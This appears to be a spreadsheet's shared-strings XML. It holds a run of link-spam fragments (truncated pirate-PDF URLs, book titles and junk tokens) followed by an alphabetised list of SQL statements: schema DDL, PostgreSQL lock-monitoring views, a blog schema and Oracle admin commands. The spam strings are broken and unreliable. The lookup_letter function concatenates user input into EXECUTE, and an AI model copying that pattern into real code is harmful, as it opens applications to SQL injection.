  </si>
  <si>
    <t>html The Life Adventures James P</t>
  </si>
  <si>
    <t xml:space="preserve"> Beckwourth, Mountaineer, Scout, Pioneer, Chief Crow Nation Indians,  syhba, http://www</t>
  </si>
  <si>
    <t>com/indonesian-literature/pdf-14428-256-boardwalk_bust_hardy_boys_</t>
  </si>
  <si>
    <t>html Boardwalk Bust (Hardy Boys),  8]]], http://www</t>
  </si>
  <si>
    <t>com/foodie/pdf-14209-6-walt_disney_s_snow_white_and_the_seven_dwarfs</t>
  </si>
  <si>
    <t>html Walt Disney's Snow White seven dwarfs,  585, http://www</t>
  </si>
  <si>
    <t>com/wonder-woman/pdf-14419-457-from_batum_to_baghdad</t>
  </si>
  <si>
    <t>html From Batum Baghdad,  wuj, http://www</t>
  </si>
  <si>
    <t>com/young-adu comment6, http://www</t>
  </si>
  <si>
    <t>com/witchcraft/pdf-14410-51-andrew_henry_s_meadow</t>
  </si>
  <si>
    <t>html Andrew Henry's Meadow,  iuczi, http://www</t>
  </si>
  <si>
    <t>com/words/pdf-14180-28-flight_to_the_reich</t>
  </si>
  <si>
    <t>html Flight Reich,   = PP, http://www</t>
  </si>
  <si>
    <t>com/women-and-gender-studies/pdf-14295-317-enjoy_debussy_piano_solos</t>
  </si>
  <si>
    <t>html Enjoy Debussy Piano Solos,  5678, http://www</t>
  </si>
  <si>
    <t>com/azeroth/pdf-13921-64-preventive_medicine_for_doctor_in_his_community</t>
  </si>
  <si>
    <t>html Preventive Medicine Doctor His Community,  %D, http://www</t>
  </si>
  <si>
    <t>com/musician-erotica/pdf-13932-216-animals_have_more_sense</t>
  </si>
  <si>
    <t>html Animals Have More Sense,  lud, http://www</t>
  </si>
  <si>
    <t>com/amateur-sleuth/pdf-14347-70-logical_logic</t>
  </si>
  <si>
    <t>html Logic comment6, http://www</t>
  </si>
  <si>
    <t>com/mysticism/pdf-14431-474-the_shaman</t>
  </si>
  <si>
    <t>html The Shaman,  ydcply, http://www</t>
  </si>
  <si>
    <t>biz/mills-and-boon/pdf-14465-72-power_of_self_coaching_the_five_essential_steps_to_creating_the_life_you_want</t>
  </si>
  <si>
    <t>html Power Self-Coaching: The Five Essential Steps Creating Life You Want,  lsgnb, http://www</t>
  </si>
  <si>
    <t>com/trivia/pdf-13965-386-stranger_things_constable_crime_</t>
  </si>
  <si>
    <t>html Stranger Things (Constable crime),  482373, http://www</t>
  </si>
  <si>
    <t>com/criticism/pdf-14355-364-the_rosary</t>
  </si>
  <si>
    <t>html The Rosary,  :(((, http://www</t>
  </si>
  <si>
    <t>org/african-literature/pdf-13953-485-explorations_introduction_to_astronomy</t>
  </si>
  <si>
    <t>html Explorations: Introduction Astronomy,  xayt, http://www</t>
  </si>
  <si>
    <t>com/webcomic/pdf- comment6, http://www</t>
  </si>
  <si>
    <t>com/young-adult-contemporary/pdf-14426-484-invit_au_monde_franco</t>
  </si>
  <si>
    <t>html Invit Au Monde Franco,  %((, http://www</t>
  </si>
  <si>
    <t>com/josei/pdf-14195-161-roman_britain</t>
  </si>
  <si>
    <t>html Roman Britain,  8-PP, http://www</t>
  </si>
  <si>
    <t>com/knitting/pdf-14169-433-the_joy_of_lex</t>
  </si>
  <si>
    <t>html The Joy Lex,  qnvclk, http://www</t>
  </si>
  <si>
    <t>com/canon/pdf-14214-208-predator_and_prey_prowlers_</t>
  </si>
  <si>
    <t>html Predator Prey (Prowlers),  :(, http://www</t>
  </si>
  <si>
    <t>com/slash-fiction/pdf-14258-270-across_the_bridge</t>
  </si>
  <si>
    <t>html Across Bridge,   = -]]], http://www</t>
  </si>
  <si>
    <t>com/cities/pdf-14380-228-technical_analysis_of_stocks_and_commodities</t>
  </si>
  <si>
    <t>html Technical Analysis Stocks Commodities,  472, http://www</t>
  </si>
  <si>
    <t>com/moscow comment6, http://www</t>
  </si>
  <si>
    <t>com/trivia/pdf-14361-87-repair_guide_for_fiat_850_peter_russek_glovebox_series_</t>
  </si>
  <si>
    <t>html Repair Guide Fiat 850 (Peter Russek glovebox series),  8-PPP, http://www</t>
  </si>
  <si>
    <t>com/moscow/pdf-14151-258-a_christmas_visitor</t>
  </si>
  <si>
    <t>html A Christmas Visitor,  yblii, http://www</t>
  </si>
  <si>
    <t>com/fables/pdf-14044-233-jacques_henri_lartigue_photofile_</t>
  </si>
  <si>
    <t>html Jacques Henri Lartigue (Photofile),  :[[, http://www</t>
  </si>
  <si>
    <t>org/african-literature/pdf-14394-221-the_polished_hoe</t>
  </si>
  <si>
    <t>html The Polished Hoe,  leeo, http://www</t>
  </si>
  <si>
    <t>com/cities/pdf-14190-70-poverty_in_england_1601_1936_illustrated_sources_in_history_</t>
  </si>
  <si>
    <t>html Poverty England, 1601-1936 (Illustrated sources history),  31545, http://www</t>
  </si>
  <si>
    <t>bestofferto comment6, http://www</t>
  </si>
  <si>
    <t>com/queer/pdf-14218-236-the_walker_bedtime_book</t>
  </si>
  <si>
    <t>html The Walker Bedtime Book,  gryvhg, http://www</t>
  </si>
  <si>
    <t>com/fat-acceptance/pdf-14077-374-look_back_in_anger</t>
  </si>
  <si>
    <t>html Look Back Anger,  05830, http://www</t>
  </si>
  <si>
    <t>com/humanities/pdf-14281-148-mirror_image</t>
  </si>
  <si>
    <t>html Mirror Image,  &gt; :-OO, http://www</t>
  </si>
  <si>
    <t>html SEEING THE INVISIBLE PB (Champions faith),  &gt; :-D, http://www</t>
  </si>
  <si>
    <t>com/italian-literature/pdf-14354-67-praying_to_get_results</t>
  </si>
  <si>
    <t>html Praying Get Results,  obtlvd, http://www</t>
  </si>
  <si>
    <t>com/feminist-studies/pdf-13931-334-the_divine_pity</t>
  </si>
  <si>
    <t>html The Divine Pity</t>
  </si>
  <si>
    <t>ALTER SYSTEM FLUSH SHARED_POOL</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.altidcollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.andsactivity OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.andsparty OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.andsservice OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.contributorcollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.custodiancollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.dataformatscollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.fundingcollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.guestusersgroup OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.metadatacollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.metadatamedia OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.microscopecollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.portalimportdetails OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.projectscollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.publishercollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.relatedurlscollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.subjectforcollection OWNER TO omerouser</t>
  </si>
  <si>
    <t>ALTER TABLE metadatacollectionschema.subjectseoccollection OWNER TO omerouser</t>
  </si>
  <si>
    <t xml:space="preserve">ALTER TABLE products ADD CONSTRAINT pk_products PRIMARY KEY  ( id )  CREATE TABLE patches  (  id int PRIMARY KEY, patch int, product int FOREIGN KEY REFERENCES products ( id ) , release date  ) </t>
  </si>
  <si>
    <t xml:space="preserve">ALTER TABLE products ADD CONSTRAINT u_product_version UNIQUE  ( product, version ) </t>
  </si>
  <si>
    <t xml:space="preserve">ALTER USER username identified by new_password </t>
  </si>
  <si>
    <t>ANALYZE</t>
  </si>
  <si>
    <t>ANALYZE lockdemo</t>
  </si>
  <si>
    <t>ANALYZE pg_language</t>
  </si>
  <si>
    <t>ANALYZE sample</t>
  </si>
  <si>
    <t>ANALYZE sample1</t>
  </si>
  <si>
    <t>ANALYZE sample2</t>
  </si>
  <si>
    <t>BEGIN OPEN curs</t>
  </si>
  <si>
    <t>BEGIN TRANSACTION</t>
  </si>
  <si>
    <t>BEGIN WORK</t>
  </si>
  <si>
    <t>BEGIN sqlsetname : =  'MY_STS_WORKLOAD'</t>
  </si>
  <si>
    <t xml:space="preserve">CALL RAND ( 0 ) </t>
  </si>
  <si>
    <t>CLOSE curs</t>
  </si>
  <si>
    <t>CLUSTER lockdemo USING i_lockdemo</t>
  </si>
  <si>
    <t>COMMIT</t>
  </si>
  <si>
    <t>CONNECT /AS SYSDBA</t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_anon_user ( char, char, char )  RETURNS BIGINT AS ' INSERT INTO sylph.users ( name, is_anonymous, pass_hash, web_site )  VALUES  ( $1, true, $2, $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_article ( char, char, char )  RETURNS BIGINT AS ' SELECT sylph.add_post ( ''article'', $1, false, $2, $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_comment ( integer, char, char )  RETURNS BIGINT AS ' SELECT sylph.add_post ( ''comment'', $2, true, ''comment'', $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_link ( char, char, char )  RETURNS BIGINT AS ' SELECT sylph.add_post ( ''link'', $1, true, $2, $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_news ( char, char, char )  RETURNS BIGINT AS ' SELECT sylph.add_post ( ''news'', $1, false, $2, $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_post ( char, char, boolean, char, char )  RETURNS BIGINT AS ' INSERT INTO sylph.posts ( type_id,user_id,is_visible,title,content )  VALUES  (   ( SELECT id FROM sylph.post_types WHERE name  =  $1 ) ,  ( SELECT id FROM sylph.users WHERE name  =  $2 ) , $3, $4, $5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_software ( char, char, char )  RETURNS BIGINT AS ' SELECT sylph.add_post ( ''software'', $1, true, $2, $3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_user ( char, char, char, char, char )  RETURNS BIGINT AS ' INSERT INTO sylph.users ( name, is_anonymous, pass_hash, full_name, email, web_site )  VALUES  ( $1, false, $2, $3, $4, $5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE FUNCTION sylph.add_version ( char, char )  RETURNS BIGINT AS ' INSERT INTO versions ( post_id, name )  VALUES  (   ( SELECT id FROM sylph.posts WHERE type_id  =   ( SELECT id FROM sylph.post_types WHERE name  =  ''software'' )  AND is_visible  =  true AND title  =  $1 ) , $2  ) </t>
  </si>
  <si>
    <t>CREATE GROUP sylph_web</t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX IDX_TEST_TYPE ON TEST ( TYPE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX IDX_TEST_TYPE_VALUE ON TEST ( TYPE, VALUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX IDX_TEST_VALUE ON TEST ( VALUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX IDX_TEST_VALUE_D ON TEST ( VALUE DESC ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX TEST_DATA ON TEST ( DATA ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX aadv_uwk_idx_01 ON user_workload  ( module ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX aadv_uwk_idx_02 ON user_workload  ( username ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX i_sample1 on sample1  ( id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX i_sample2 on sample2  ( id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_comments_comment ON sylph.comments ( comment_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_comments_post ON sylph.comments ( post_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_post_tags_post ON sylph.post_tags ( post_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_post_tags_tag ON sylph.post_tags ( tag_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_posts_post_is_visible ON sylph.posts ( is_visible ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_posts_post_type ON sylph.posts ( type_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_posts_post_user ON sylph.posts ( user_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_users_is_anonymous ON sylph.users ( is_anonymous ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX in_versions_post ON sylph.versions ( post_id ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE INDEX instructor_ix_fname_lname ON Instructor ( fname, lname ) </t>
  </si>
  <si>
    <t>CREATE OR REPLACE FUNCTION lookup_letter ( text )  RETURNS SETOF text AS $$ BEGIN RETURN QUERY EXECUTE ' EXPLAIN SELECT letter FROM sample WHERE letter  =  ''' || $1 || ''''</t>
  </si>
  <si>
    <t>CREATE OR REPLACE PROCEDURE show_recm  ( in_task_name IN VARCHAR2 )  IS CURSOR curs IS SELECT DISTINCT action_id, command, attr1, attr2, attr3, attr4 FROM user_advisor_actions WHERE task_name  =  in_task_name ORDER BY action_id</t>
  </si>
  <si>
    <t>CREATE RULE r_lockdemo AS ON INSERT TO lockdemo DO INSTEAD NOTHING</t>
  </si>
  <si>
    <t>CREATE SCHEMA metadataCollectionSchema</t>
  </si>
  <si>
    <t>CREATE SCHEMA sylph</t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE #T1  ( SNO char ( 6 ) , Shipping smallint CONSTRAINT PK#T1 PRIMARY KEY  ( SNO  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE #T2  ( SNO char ( 6 ) , Used smallint CONSTRAINT PK#T2 PRIMARY KEY  ( SNO  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE E ( ENO char ( 2 ) , EName varchar ( 8 ) , BossENO char ( 2 ) , CONSTRAINT PKE PRIMARY KEY  ( ENO ) , CONSTRAINT FKE FOREIGN KEY  ( BossENO )  REFERENCES E ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE Instructor  (  username VARCHAR ( 8 ) , fname VARCHAR ( 50 ) , lname VARCHAR ( 50 ) , started_on CHAR ( 10 ) , PRIMARY KEY  ( username )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE TEST ( ID INT PRIMARY KEY ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE TEST ( ID INT PRIMARY KEY, DATA INT ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE TEST ( ID INT PRIMARY KEY, TYPE INT ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE TEST ( ID INT PRIMARY KEY, TYPE INT, VALUE DECIMAL ( 100, 2  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE TEST ( ID INT PRIMARY KEY, VALUE DECIMAL ( 100, 2  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE Teaches  (  username VARCHAR ( 8 ) , dept VARCHAR ( 6 ) , number INTEGER, PRIMARY KEY  ( username, dept, number ) , FOREIGN KEY  ( username )  REFERENCES Instructor ( username ) , FOREIGN KEY  ( dept, number )  REFERENCES Class ( dept, number )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE lockdemo  ( col int ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.altidcollection  (  internalidcol numeric, idtypecol text, idcol text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.andsactivity  (  activity text, activitycode text, activityid bigint NOT NULL, CONSTRAINT andsactivity_pkey PRIMARY KEY  ( activityid )   )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.andsparty  (  partycode text, party text, partyid bigint NOT NULL, CONSTRAINT andsparty_pkey PRIMARY KEY  ( partyid )   )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.andsservice  (  servicecode text, service text, serviceid bigint NOT NULL, CONSTRAINT andsservice_pkey PRIMARY KEY  ( serviceid )   )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.contributorcollection  (  internalidcol numeric, individualcontributorcol text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.custodiancollection  (  internalidcol numeric, custodian text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.dataformatscollection  (  internalidcol numeric, extcol character varying ( 10 )   )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.fundingcollection  (  internalidcol numeric, fundingsourceproj text, fundingsourceidproj text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.guestusersgroup  (  groupid numeric, guestlogin text, guestloginid numeric, guestloginpass text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.metadatacollection  (  internalidcol numeric NOT NULL, namecol text, registrycol character varying ( 125 ) , descriptioncol text, typecol character varying ( 125 ) , custodiancol text, coveragecol text , langcol character varying ( 25 )  , resourcetypecol character varying ( 125 ) , projectcol text, projectdescol text, publishstatus boolean DEFAULT false, CONSTRAINT metadatacollection_pkey PRIMARY KEY  ( internalidcol )   )  WITH  ( OIDS = FALSE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.metadatamedia  (  omeroid integer NOT NULL, internalidcol numeric, namecollection text, investigationdesc text, snumber text, researchername text, campusorlocation text, species text, stains text, dyes text, tissueenvironment text, tissuetype text, publishstatus boolean NOT NULL DEFAULT false, CONSTRAINT metadatamedia_pkey PRIMARY KEY  ( omeroid )   )  WITH  ( OIDS = FALSE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.microscopecollection  (  internalidcol numeric, microscope text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.portalimportdetails  (  jobid bigint NOT NULL, jobstatus text, filecountforuser integer, files text, import_description text, uid text, fullname text, collid text, camporloc text, species text, stains text, dyes text, tenv text, ttype text, num_files integer, CONSTRAINT portalimportdetails_pkey PRIMARY KEY  ( jobid )   )  WITH  ( OIDS = FALSE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.projectscollection  (  internalidcol numeric, project text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.publishercollection  (  internalidcol numeric, publishercol text, publisherdesc text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.relatedurlscollection  (  internalidcol numeric, relatedurlscol text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.subjectforcollection  (  internalidcol numeric, forcol text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE metadatacollectionschema.subjectseoccollection  (  internalidcol numeric, seoccol text  )  WITH  ( OIDS = TRUE ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE patches  (  id int NOT NULL, product_id int, patch int NOT NULL, release date, PRIMARY KEY  ( id ) , CONSTRAINT fk_product_patches FOREIGN KEY  ( id )  REFERENCES products ( id )   ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE products  (  id int, product varchar ( 30 ) , type varchar ( 30 ) , version int, release date  )  CREATE TABLE products  (  id int, product varchar ( 30 ) , type varchar ( 30 ) , version int, release date  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.banned_ips  (  id SERIAL PRIMARY KEY, ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, ip VARCHAR ( 16 )  UNIQUE NOT NULL  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.banned_terms  (  id SERIAL PRIMARY KEY, ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, content TEXT UNIQUE NOT NULL  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.comments  (  post_id INTEGER NOT NULL CONSTRAINT fk_comments_post REFERENCES sylph.posts ( id )  ON UPDATE CASCADE ON DELETE CASCADE, comment_id INTEGER NOT NULL CONSTRAINT fk_comments_comment REFERENCES sylph.posts ( id )  ON UPDATE CASCADE ON DELETE CASCADE  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.post_tags  (  post_id INTEGER NOT NULL CONSTRAINT fk_post_tags_post REFERENCES sylph.posts ( id )  ON UPDATE CASCADE ON DELETE CASCADE, tag_id INTEGER NOT NULL CONSTRAINT fk_post_tags_tag REFERENCES sylph.tags ( id )  ON UPDATE CASCADE ON DELETE CASCADE  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.post_types  (  id SERIAL PRIMARY KEY, name VARCHAR ( 16 )  UNIQUE NOT NULL  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.posts  (  id SERIAL PRIMARY KEY, type_id INTEGER NOT NULL CONSTRAINT fk_posts_post_type REFERENCES sylph.post_types ( id )  ON UPDATE CASCADE ON DELETE CASCADE, user_id INTEGER NOT NULL CONSTRAINT fk_posts_user REFERENCES sylph.users ( id )  ON UPDATE CASCADE ON DELETE CASCADE, -- timestamps ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, ts_updated TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, -- flags is_visible BOOLEAN NOT NULL DEFAULT false, is_closed BOOLEAN NOT NULL DEFAULT false, -- content title VARCHAR ( 100 )  NOT NULL DEFAULT '', content TEXT NOT NULL DEFAULT ''  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.tags  (  id SERIAL PRIMARY KEY, name VARCHAR ( 64 )  NOT NULL, ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.users  (  id SERIAL PRIMARY KEY, -- timestamps ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, ts_updated TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, name VARCHAR ( 32 )  UNIQUE NOT NULL, -- flags is_anonymous BOOLEAN NOT NULL DEFAULT true, is_admin BOOLEAN NOT NULL DEFAULT false, is_locked BOOLEAN NOT NULL DEFAULT false, -- attributes pass_hash VARCHAR ( 64 )  NOT NULL DEFAULT '', full_name TEXT NOT NULL DEFAULT '', email TEXT NOT NULL DEFAULT '', web_site TEXT NOT NULL DEFAULT ''  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE sylph.versions  (  id SERIAL PRIMARY KEY, post_id INTEGER NOT NULL CONSTRAINT fk_post_tags_post REFERENCES sylph.posts ( id )  ON UPDATE CASCADE ON DELETE CASCADE, -- basic attributes name VARCHAR ( 32 )  NOT NULL, ts_created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, -- flags is_visible BOOLEAN NOT NULL DEFAULT true, has_rubygem BOOLEAN NOT NULL DEFAULT false, -- urls url_download TEXT NOT NULL DEFAULT '', url_signature TEXT NOT NULL DEFAULT '', url_changelog TEXT NOT NULL DEFAULT ''  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE temp  ( JobId BIGINT NOT NULL, JobTDate BIGINT, ClientId BIGINT, Level CHAR, StartTime TEXT, VolumeName TEXT, StartFile BIGINT, VolSessionId BIGINT, VolSessionTime BIGINT  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE temp2  ( JobId BIGINT NOT NULL, StartTime TEXT, VolumeName TEXT, Level CHAR, StartFile BIGINT, VolSessionId BIGINT, VolSessionTime BIGINT ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TEMPORARY TABLE sample  ( letter, junk )  AS SELECT substring ( relname, 1, 1 ) , repeat ( 'x', 250 )  FROM pg_class ORDER BY random (  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TEMPORARY TABLE sample1  ( id, junk )  AS SELECT oid, repeat ( 'x', 250 )  FROM pg_proc ORDER BY random (  ) </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE UNIQUE INDEX i_lockdemo on lockdemo ( col ) </t>
  </si>
  <si>
    <t>CREATE USER CALVIN IDENTIFIED BY HOBBES;</t>
  </si>
  <si>
    <t>CREATE VIEW V1 ( SNO,Shipping )  AS SELECT SNO, SUM ( QTY )  AS Shipping FROM SP GROUP BY SNO</t>
  </si>
  <si>
    <t xml:space="preserve">CREATE VIEW lock_stat_view AS SELECT pg_stat_activity.procpid AS pid, current_query, waiting, vxid, lock_type, lock_mode, granted, xid_lock FROM lockview JOIN pg_stat_activity ON  ( lockview.pid  =  pg_stat_activity.procpid ) </t>
  </si>
  <si>
    <t>CREATE VIEW lockinfo_hierarchy AS WITH RECURSIVE lockinfo1 AS  (  SELECT pid, vxid, granted, xid_lock, lock_type, relname, page, tuple FROM lockview WHERE xid_lock IS NOT NULL AND relname IS NULL AND granted UNION ALL SELECT lockview.pid, lockview.vxid, lockview.granted, lockview.xid_lock, lockview.lock_type, lockview.relname, lockview.page, lockview.tuple FROM lockinfo1 JOIN lockview ON  ( lockinfo1.xid_lock  =  lockview.xid_lock )  WHERE lockview.xid_lock IS NOT NULL AND lockview.relname IS NULL AND NOT lockview.granted AND lockinfo1.granted ) , lockinfo2 AS  (  SELECT pid, vxid, granted, xid_lock, lock_type, relname, page, tuple FROM lockview WHERE lock_type  =  'tuple' AND granted UNION ALL SELECT lockview.pid, lockview.vxid, lockview.granted, lockview.xid_lock, lockview.lock_type, lockview.relname, lockview.page, lockview.tuple FROM lockinfo2 JOIN lockview ON  (  lockinfo2.lock_type  =  lockview.lock_type AND lockinfo2.relname  =  lockview.relname AND lockinfo2.page  =  lockview.page AND lockinfo2.tuple  =  lockview.tuple )  WHERE lockview.lock_type  =  'tuple' AND NOT lockview.granted AND lockinfo2.granted  )  SELECT * FROM lockinfo1 UNION ALL SELECT * FROM lockinfo2</t>
  </si>
  <si>
    <t>CREATE VIEW lockview AS SELECT pid, virtualtransaction AS vxid, locktype AS lock_type, mode AS lock_mode, granted, CASE WHEN virtualxid IS NOT NULL AND transactionid IS NOT NULL THEN virtualxid || ' ' || transactionid WHEN virtualxid::text IS NOT NULL THEN virtualxid ELSE transactionid::text END AS xid_lock, relname, page, tuple, classid, objid, objsubid FROM pg_locks LEFT OUTER JOIN pg_class ON  ( pg_locks.relation  =  pg_class.oid )  WHERE -- do not show our view's locks pid ! =  pg_backend_pid (  )  AND -- no need to show self-vxid locks virtualtransaction IS DISTINCT FROM virtualxid ORDER BY 1, 2, 5 DESC, 6, 3, 4, 7</t>
  </si>
  <si>
    <t>CREATE VIEW lockview1 AS SELECT pid, vxid, lock_type, lock_mode, granted, xid_lock, relname FROM lockview ORDER BY 1, 2, 5 DESC, 6, 3, 4, 7</t>
  </si>
  <si>
    <t>CREATE VIEW lockview2 AS SELECT pid, vxid, lock_type, page, tuple, classid, objid, objsubid FROM lockview ORDER BY 1, 2, granted DESC, vxid, xid_lock::text, 3, 4, 5, 6, 7, 8</t>
  </si>
  <si>
    <t>CREATE VIEW sylph.articles AS SELECT id, user_id, title, content,  ( SELECT COUNT ( * )  FROM sylph.comments WHERE post_id  =  p.id )  AS num_comments FROM sylph.posts p WHERE type_id  =   ( SELECT id FROM sylph.post_types WHERE name  =  'article' )  AND is_visible  =  true</t>
  </si>
  <si>
    <t>CREATE VIEW sylph.links AS SELECT id, content AS link, title FROM sylph.posts WHERE type_id  =   ( SELECT id FROM sylph.post_types WHERE name  =  'link' )  AND is_visible  =  true</t>
  </si>
  <si>
    <t>CREATE VIEW sylph.news AS SELECT id, user_id, title, content,  ( SELECT COUNT ( * )  FROM sylph.comments WHERE post_id  =  p.id )  AS num_comments FROM sylph.posts p WHERE type_id  =   ( SELECT id FROM sylph.post_types WHERE name  =  'news' )  AND is_visible  =  true</t>
  </si>
  <si>
    <t>CREATE VIEW sylph.software AS SELECT id, user_id, title, content,  ( SELECT COUNT ( * )  FROM sylph.comments WHERE post_id  =  p.id )  AS num_comments FROM sylph.posts p WHERE type_id  =   ( SELECT id FROM sylph.post_types WHERE name  =  'article' )  AND is_visible  =  true</t>
  </si>
  <si>
